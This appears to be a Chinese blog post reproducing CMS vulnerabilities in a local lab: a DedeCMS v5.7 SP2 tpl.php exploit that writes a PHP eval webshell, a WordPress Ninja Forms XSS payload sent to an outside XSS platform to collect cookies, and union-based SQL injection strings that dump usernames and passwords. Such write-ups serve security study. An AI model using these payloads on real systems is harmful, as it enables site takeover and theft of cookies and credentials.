CMS漏洞复现

最新推荐文章于 2024-05-07 12:48:55 发布
最新推荐文章于 2024-05-07 12:48:55 发布
阅读量9.7k 收藏 27
点赞数 4
分类专栏: 新知识
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44832048/article/details/96483091
版权

dedeCMS (CNVD-2018-01221)

类型:

php类cms系统:dedecms、帝国cms、php168、phpcms、cmstop、discuz、phpwind等
asp类cms系统:zblog、KingCMS等
国外的著名cms系统:joomla、WordPress 、magento、drupal 、mambo。

dedeCMS (CNVD-2018-01221)

漏洞简介
Dedecms v5.7 sp2版本tpl.php存在代码执行漏洞,攻击者可以利用该漏洞在增加的新的标签中上传木马

 

else if($action=='savetagfile')
{
    csrf_check();
    if(!preg_match("#^[a-z0-9_-]{1,}\.lib\.php$#i", $filename))
    {
        ShowMsg('文件名不合法,不允许进行操作!', '-1');
        exit();
    }
    require_once(DEDEINC.'/oxwindow.class.php');
    $tagname = preg_replace("#\.lib\.php$#i", "", $filename);
    $content = stripslashes($content);
    $truefile = DEDEINC.'/taglib/'.$filename;
    $fp = fopen($truefile, 'w');
    fwrite($fp, $content);
    fclose($fp);

 

 

 

首先我们打开tpl.php文件后,找到指定目录,还有在PHP代码里发现了参数,我们把他get下来,复制到URL里面,发现要上传东西,我们首先要尝试随便传个,Ctrl+u查看源码,发现

 

除此之外我们还发现另外一个参数,感觉有用把他也get下来

我们首先要尝试随便传个,Ctrl+u查看源码,发现 token的意思是“令牌”,是服务端生成的一串字符串,作为客户端进行请求的一个标识。把这个参数也get下来,并且赋值,

 

 再加上个一句话木马,

最后得到如下

http://127.0.0.1/DedeCMS-V5.7-UTF8-SP2/uploads/dede/tpl.php?action=savetagfile&token=db3b7aab1cdd04a0ff498b6b369caec7&filename=123.lib.php&content=<?php @eval($_POST["hello"]);?>

然后打开菜刀,右键添加,在地址上面,本地IP加目录路径和创建的PHP文件名,点击添加,打开文档就OK

Wordpress (CVE-2018-19287)

环境搭建好了之后,打开网站根目录的url点击插件的已安装插件,启用Ninja Forms,

打开这个网站,发现有一个弹窗,但是弹窗不是目的,只是证明这个网站存在xss漏洞,

http://127.0.0.1/wp-admin/edit.php?post_status=trash&post_type=nf_sub&form_id=1"><script>alert(/POC3/);</script>&nf_form_filter&paged=1

 

http://www.l31.cc/index.php

 

这个xss后台,进去之后,创建项目,

把这个xss复制上去,成功。

 

查看xss。项目详情,就看到了cookie,

sql注入。。。

进入SQL命令行,

应该记住在网页上要先获取库名----->表名------>字段名------>最终的值

information_schema  
-tables  
-- table_name tables表中的字段名,存放着其他数据库中的表的名字

-columns
--columns_name tables表中的字段名,存放着其他数据库中的表的名字

-- table_schema 指定数据库,

database() mysql下的函数,表示当前数据库名


information_schema.tables

concat(table_name) from information_schema.tables where table_schema=database();  ‘security’

 

获得表名 

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema ='security'--+

获得所有用户名

?id=-1' union select 1,2,group_concat(username) from security.users--+

获得字段名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+

获得所有密码  

?id=-1' union select 1,2,group_concat(password) from security.users--+

南吕十七
关注
  • 4
    点赞
  • 27
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
phpcms v9.任意文件上传漏洞复现
newlife1441的博客
08-15 4558
如果你也出现上面的情况请试试下面说的方法:这里有一个小坑注意,你在压缩前面的文件时要注意他们在压缩文件中的顺序,意思就是你创建的一个php文件在创建的txt文件的上面就可以成功,只有这样在解压失败后它还是能够保留并将php文件成功解压出来。时间竞争漏洞利用原理其实就是在解压文件后与删除限制的文件之间的时间空隙来利用提前在限制的文件中写好的利用代码在非解压目录下生成新的不会被删除的新文件(木马),通过这个木马来拿下网站。原理:这里我们通过利用解压文件在解压过程出错会导致后面的递归删除操作不会执行的特点。...
74cms代码执行漏洞
01-03
74cms代码执行漏洞 docker
yxcms弱口令至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 1851
yxcms弱口令至getshell 漏洞复现
Web安全 | EmpireCMS漏洞常见漏洞分析及复现
Javachichi的博客
10-29 2340
本文将对EmpireCMS(帝国cms)的漏洞进行分析及复现
2024年网络安全最新Web安全 EmpireCMS漏洞常见漏洞分析及复现(1),2024年最新字节跳动面试官
最新发布
2401_84301948的博客
05-07 659
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
CMS漏洞(发货100CMS、SHECMS、ZHCMS、MACCMS)详解实战
xinyue9966的博客
02-18 7139
CMS漏洞发货100CMS(弱口令)介绍系统版本靶场搭建漏洞复现修复方案SHECMS(SQL注入)介绍系统版本靶场搭建漏洞复现修复方案ZHCMS(文件上传)介绍系统版本靶场搭建漏洞复现修复方案MACCMS(CNVD-2019-43865)介绍系统版本靶场搭建漏洞复现修复方案 发货100CMS(弱口令) 介绍 弱口令漏洞 由于网站用户帐号存在弱口令,导致攻击者通过弱口令可轻松登录到网站中,从而进行下一步的攻击,如上传webshell,获取敏感数据。另外攻击者利用弱口令登录网站管理后台,可执行任意管理员的操作
常见的cms以及对应cms的历史漏洞
weixin_58155715的博客
11-28 602
OpenCart:OpenCart 是一款免费的电商 CMS,也曾出现过多个漏洞,包括 SQL 注入、文件包含、跨站脚本等。Drupal:Drupal 是一款强大的 CMS,但也曾经出现过多个漏洞,包括 SQL 注入、跨站脚本、文件包含等。WordPress:这是最流行的 CMS,曾出现过许多漏洞,包括 SQL 注入、XSS、CSRF、权限提升等。Joomla:这款 CMS 曾经出现过一些严重的漏洞,包括 SQL 注入、文件包含、跨站脚本等。Drupal 7.24 版本中的 SQL 注入漏洞
CMS知识小结及wordpress的安装与漏洞复现
人若有志,就不会在半坡停止。
09-11 2623
CMS是Content Management System的缩写,意为"内容管理系统",是一种帮助用户创建、管理和修改网站内容而无需专业技术知识的软件。内容管理系统是一种位于WEB 前端(Web服务器)和后端办公系统或流程(内容创作、编辑)之间的软件系统。内容的创作人员、编辑人员、发布人员使用内容管理系统来提交、修改、审批、发布内容。这里指的“内容”可能包括文件、表格、图片、数据库中的数据甚至视频等一切你想要发布到Internet、Intranet以及Extranet(外网)网站的信息。
php漏洞打包
05-13
网上弄到的php漏洞利用代码。
74CMS 3.0 SQL注入漏洞后台.docx
07-07
74CMS 3.0 SQL 注入漏洞后台 本节将对 74CMS 3.0 SQL 注入漏洞后台进行详细分析,首先介绍了攻击环境的搭建,然后对代码进行了详细的审计,最后对漏洞进行了分析。 一、搭建攻击环境 为了进行攻击,我们需要搭建...
国微CMS学校网站系统(PHP168 S系列) v20180925.zip
07-07
国微CMS学校网站系统是一个以php MySQL进行开发的学校网站系统。国微学校方案重点为大学、中学、技校提供高性能解决方案,可快速将学校信息化迈入实用高效的水平。功能包括:精品课程系统、录取查询系统、学籍查询系统、教 师名录查询系统、招生系统、文章模块、视频模块、图片模块、下载模块、问答系统、表单系统、在线办事系统、广告模块、服务反馈体系、手机群发平台、邮件群 发平台、用户体系、在线招聘平台、留言本等模块。 国微CMS学校网站系统(PHP168 S系列) v20180925 更新日志 1、新增可以自由开启内网和外网访问。 2、新增了每个栏目IP访问、内容IP访问控制。 3、搜索集约化处理;更加方便方向代理。 4、cook进行了加密。 5、其余10余项项目此安全优化。 国微CMS学校网站系统注意事项 1、后台超管添加附件类型得到控制,只允许 rar zip png jpg gif swf pdf doc docx xls xlsx mp4 flv CSV常规附件类型 2、后台编辑模板方面,如果网站完成,我们通过上传一个配置文件,就关闭掉后台编辑模板功能。如果要开启,需要进入服务器,开启才行。类似强制登陆那种模式。 3、后台登陆可以开启不断变化的验证码(安全码也保留)。 4、后台密码必须要8位(不影响现在的密码体系前提下,因为很多超管密码给分站管理员后,都改为简单容易记住的) 国微CMS学校网站系统功能 系统体系化 模块化体系:所有功能均已系统化、模块化、插件化,如CMS、问答、广告、标签 用户体系: 不仅区分企业、个人,并可自由添加角色组与角色,使其用户体系与实体一致。 权限体系: 所有功能模块封装并与权限匹配,可以细化至栏目对接角色管理权限。 标签体系: 常规标签、变量标签、标签后缀、标签缓存体系等已全面实施。 模板体系: 从方案模板、会员中心、系统模块模板、栏目、列表页面、内容页完全可独立选择。 积分体系: 积分兑换、积分消费、积分规则等已经开始在系统内实施。 菜单体系: 后台菜单、前台菜单、会员中心菜单均可自由添加和控制。 安全体系: 支持IP黑名单、白名单、支持防CC攻击、支持批量过滤敏感词汇。 通讯体系: 手机模块、邮件模块、短消息模块均已做成接口模式,任意功能均可方便调用。 程序整合体系:将支持PHPwind、UC、PHP168自身等系统整合,同时互动百科也将整合。   易用性: A、全部前台可视化操作,可视即可操作。 B、一键化应用:如一键安装、一键缓存、一键静态、一键更换模板。 C、标签样式不断增加,只需用鼠标选择想用的样式即可。 D、自由组装和拆卸模块与插件。 E、掌握时间1小时学会建站。 国微CMS学校网站系统前台页面 国微CMS学校网站系统后台管理 后台登陆路径:域名/admin.php  后台登陆用户名与密码是在安装过程中设置的,要谨记 后台页面   相关阅读 同类推荐:站长常用源码
邮件批量发送器(含源码).rar
08-29
邮件批量发送器(含源码)
梦想cms(lmxcms)网站管理系统 v1.4
10-24
lmxcms基于php语言和mysql数据库开发,系统采用业界流行的MVC设计模式开发,使得系统结构更加清晰明了,便于进行二次开发和管理,并且lmxcms内嵌了smarty模板引擎,使程序与模板分离,如果您足够了解lmxcms完全可以自定义模板标签。lmxcms1.4主要包括以下功能:自定义模型:可以完全自由的根据网站需要添加修改所需字段。系统安装默认自带新闻模型和产品模型。 纯静态html生成:支持纯静态html生成,不仅可以减少数据库请求,加快页面载入速度,也更加适合搜索引擎优化(SEO)。自定义表单:可以自由创建表单字段,每个表单可以自由组合表单所需要字段。站内搜索:自由组合搜索条件,包括按照模型、栏目、字段、搜索模板、时间范围等,并且支持搜索关键字记录。友情链接:支持文字和图片形式的友情链接。广告系统:后台支持文字、图片、html三种形式的广告系统。在线留言:支持自定义开启和关闭留言板,留言板页面支持调用留言数据。焦点图系统:后台可以创建焦点图片,并且系统默认了5种样式的焦点图。数据备份:后台可以备份和恢复数据库,并且可以自由下载数据库到本地。模板管理:后台支持自定义切换模板风
一马CMS 1.0
04-30
一马CMS,是全力专注于ASP伪静态的ASP免费源码,是国内唯一专注于asp伪静态源码程序,完全免费,使用简单,文件小,有利于SEO。 后台管理:adm/default.asp 管理员和密码都是admin 作者因为发现,现在市场上...
wuzhicms漏洞复现
小小猪的博客
12-11 1657
wuzhicms漏洞复现 漏洞环境搭建: 百度上面有很多,这里就不过多的讲述了 漏洞复现: 敏感信息泄露: 搭建成功后 直接后台挂个链接,这个很可以: 首先你需要进入后台,直接看到可以查看phpinfo() 两个后台sqli: 这个应该不止这两个地方 传参param给$code,然后直接拼接到sql语句中,导致sqli: coreframe\app\promote\admin\index.php中: 获取$keywords直接拼接到sql语句中,导致sqli...
ThinkPHP历史漏洞复现
weixin_53747497的博客
03-05 1096
Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的,所以 thinkphp 出问题的话,会影响很多基于 thinkphp开发的网站。例如:KenCMS、ThinkCMF、DuxCMS、易优CMS。版本漏洞缓存函数设计缺陷可导致Getshell最新版update注入漏洞find_select_delete注入order_by注入漏洞sql注入漏洞
漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 1595
【seaCms-命令执行】后门代码写入可解析文件中
CMS系统漏洞分析溯源(第6题)
tpaer的博客
11-03 660
靶场通关记录
帝国cms7.5垂直越权漏洞复现
01-02
根据提供的引用内容,帝国CMS 7.5版本及之前版本存在一个垂直越权漏洞,通过修改数据库表名可以实现任意代码执行。下面是帝国CMS 7.5垂直越权漏洞复现步骤: 1. 使用管理员账户登录帝国CMS后台。 2. 访问以下URL:`/e/admin/admin/ebak/phome.php`。 3. 在URL中修改数据库表名,以实现任意代码执行。 请注意,这是一个漏洞复现的示例,仅用于安全研究和教育目的。在实际环境中,请遵循合法和道德的行为准则。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值